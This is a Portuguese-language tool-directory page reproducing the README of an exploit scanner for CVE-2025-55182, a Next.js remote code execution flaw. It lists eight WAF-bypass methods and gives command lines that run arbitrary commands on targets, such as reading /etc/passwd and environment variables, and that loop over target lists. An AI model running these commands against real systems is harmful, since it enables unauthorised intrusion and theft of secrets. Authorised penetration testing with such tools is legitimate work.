Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
React2Shell-CVE-2025-55182-Advanced-Scanner — Scanner automatizado para RCE CVE-2025-55182 em Next.js com 8 técnicas de bypass de WAF, execução de comandos personalizada e modo de detecção somente para teste, para testes de penetração autorizados. | Kitploit
Ferramentas/GitHubGitHub/ysfcndgr/react2shell-cve-2025-55182-advanced-scanner
Scanners de VulnerabilidadesGeração de PayloadsExploraçãoExploração de Aplicações WebBypass de WAFTestes de PenetraçãoComando e Controle
GitHubysfcndgr/react2shell-cve-2025-55182-advanced-scanner

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

React2Shell-CVE-2025-55182-Advanced-Scanner

Scanner automatizado para RCE CVE-2025-55182 em Next.js com 8 técnicas de bypass de WAF, execução de comandos personalizada e modo de detecção somente para teste, para testes de penetração autorizados.

Ver Repositório
há 8 mesesAinda não revisado

CVE-2025-55182 Scanner Avançado

Python License Security

Ferramenta avançada de teste de penetração para detecção e exploração da vulnerabilidade CVE-2025-55182 em aplicações Next.js

📋 Table of Contents Visão Geral

Recursos

Instalação

Uso

Exemplos

Técnicas de Bypass

Detalhes Técnicos

Aviso Legal

Contribuição

Licença

🔍 Visão Geral CVE-2025-55182 é uma vulnerabilidade crítica de Execução Remota de Código (RCE) que afeta aplicações Next.js por meio dos React Server Components. Este scanner oferece uma forma automatizada de detectar e explorar essa vulnerabilidade com várias técnicas de bypass de WAF.

Pontuação CVSS: 9.8 (Crítica)

✨ Recursos

  • Múltiplas variantes de payload: Diferentes padrões de exploração
  • Técnicas de bypass de WAF: 8 métodos de bypass diferentes
  • Execução de comandos personalizados: Execute comandos arbitrários do sistema
  • Teste de vulnerabilidade: Modo somente teste para detecção segura
  • Suporte a proxy: Roteie o tráfego por proxy para depuração
  • Bypass de SSL: Opção para pular a verificação do certificado SSL
  • Mecanismo de repetição: Repetição automática em caso de falha
  • Saída colorida: Interface de console de fácil leitura

🚀 Instalação Pré-requisitos Python 3.6 ou superior

Gerenciador de pacotes pip

Install dependencies

pip install -r requirements.txt

Make the script executable (Linux/Mac)

chmod +x scanner.py

Instalação com Docker

root@kitploit:~
# Build Docker image
docker build -t cve-2025-55182-scanner .

# Run with Docker
docker run --rm cve-2025-55182-scanner -h

📖 Uso Uso básico

root@kitploit:~
# Show help
python scanner.py -h

# Test a target
python scanner.py -d http://target.com --test-only

# Execute command
python scanner.py -d http://target.com -c "whoami"

Opções de linha de comando

Opção Descrição Padrão -d, --domain URL do alvo http://localhost:3000 -c, --command Comando a executar id -t, --technique Técnica de bypass (1-8) 1 -p, --proxy Servidor proxy None -k, --insecure Pular verificação SSL False --test-only Apenas testar a vulnerabilidade False -h, --help Exibir mensagem de ajuda N/A

📚 Exemplos Exploração básica

root@kitploit:~
# Test if target is vulnerable
python scanner.py -d http://vulnapp.com --test-only

# Execute simple command
python scanner.py -d http://vulnapp.com -c "id"

# List directory contents
python scanner.py -d https://target.com -c "ls -la" -k

# Read system file
python scanner.py -d http://localhost:3000 -c "cat /etc/passwd"

Exemplos de bypass de WAF

root@kitploit:~
# Use Base64 encoding bypass
python scanner.py -d http://target.com -c "uname -a" -t 2

# Use Unicode encoding
python scanner.py -d https://target.com -c "whoami" -t 3 -k

# Use mixed techniques with proxy
python scanner.py -d http://target.com -c "pwd" -t 4 -p http://127.0.0.1:8080

# Try all techniques automatically
for i in {1..8}; do
    echo "Trying technique $i"
    python scanner.py -d http://target.com -c "hostname" -t $i
    echo ""
done

Uso avançado

root@kitploit:~
# Test multiple targets from file
for target in $(cat targets.txt); do
    echo "Testing $target"
    python scanner.py -d $target --test-only
done

# Save output to file
python scanner.py -d http://target.com -c "ifconfig" > output.txt

# Use with Burp Suite proxy
python scanner.py -d https://target.com -c "env" -p http://127.0.0.1:8080 -k

🛡️ Técnicas de Bypass O scanner inclui 8 técnicas diferentes de bypass de WAF:

  • Payload padrão: Padrão original de exploração
  • Codificação Base64: Codifica comandos em Base64
  • Codificação Unicode: Usa codificação de caracteres Unicode
  • Manipulação de maiúsculas/minúsculas: Variações aleatórias de caixa
  • Codificação dupla: Codificação de URL dupla
  • Bytes nulos: Injeção de byte nulo
  • Cabeçalhos mistos: Cabeçalhos HTTP variados
  • Atrasos aleatórios: Adiciona intervalos de espera aleatórios

Cada técnica pode ser selecionada com a flag -t.

🔧 Detalhes Técnicos Contexto da Vulnerabilidade CVE-2025-55182 é uma vulnerabilidade de poluição de protótipo no Next.js que leva à Execução Remota de Código por meio dos React Server Components. A vulnerabilidade permite que atacantes executem comandos arbitrários no servidor.

Estrutura do Payload A ferramenta usa uma requisição multipart/form-data especialmente elaborada com poluição de protótipo para obter RCE:

  • Poluição de protótipo: Polui a cadeia de protótipos de Promise
  • Injeção de comando: Injeta execução de child_process do Node.js
  • Extração de resultados: Extrai resultados por meio de cabeçalhos de redirecionamento

Método de Detecção O scanner envia requisições especialmente elaboradas e procura por:

  • Cabeçalhos X-Action-Redirect contendo a saída do comando
  • Padrões de resposta específicos que indicam exploração bem-sucedida
  • Mensagens de erro que sugerem a presença da vulnerabilidade

⚠️ Aviso Legal IMPORTANTE: USO APENAS LEGAL E ÉTICO

Esta ferramenta é fornecida para:

  • Pesquisa e educação em segurança
  • Testes de penetração autorizados
  • Avaliação de vulnerabilidades com a devida permissão
  • Propósitos de segurança defensiva

NÃO USE ESTA FERRAMENTA PARA:

  • Testes não autorizados de sistemas
  • Atividades ilegais
  • Propósitos maliciosos
  • Violar termos de serviço

Ao usar esta ferramenta, você concorda em:

  • Usá-la apenas em sistemas que você possui ou para os quais tem permissão explícita para testar
  • Cumprir todas as leis e regulamentos aplicáveis
  • Aceitar total responsabilidade por suas ações
  • Não responsabilizar o autor por qualquer uso indevido

🤝 Contribuição Contribuições são bem-vindas! Veja como você pode ajudar:

Relatando Problemas

  • Verifique se o problema já existe
  • Forneça etapas detalhadas de reprodução
  • Inclua mensagens de erro e logs
  • Especifique os detalhes do seu ambiente

Contribuições de Código

  • Faça um fork do repositório
  • Crie um branch de funcionalidade
  • Escreva mensagens de commit claras
  • Adicione testes, se aplicável
  • Envie um pull request

Solicitações de Recursos Sugira novos recursos por meio das issues do GitHub com o rótulo "enhancement".

📄 Licença Este projeto está licenciado sob a Licença MIT - consulte o arquivo LICENSE para obter detalhes.

MIT License

Copyright (c) 2025

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

🔗 Referências

  • Entrada Oficial do CVE-2025-55182
  • Modelo Nuclei do ProjectDiscovery
  • Avisos de Segurança do Next.js
  • Documentação dos React Server Components

⭐ Histórico de Estrelas Se você achar esta ferramenta útil, considere dar uma estrela no GitHub!

Lembre-se: Com grandes poderes vêm grandes responsabilidades. Use esta ferramenta de forma ética e legal.

Baixar ferramenta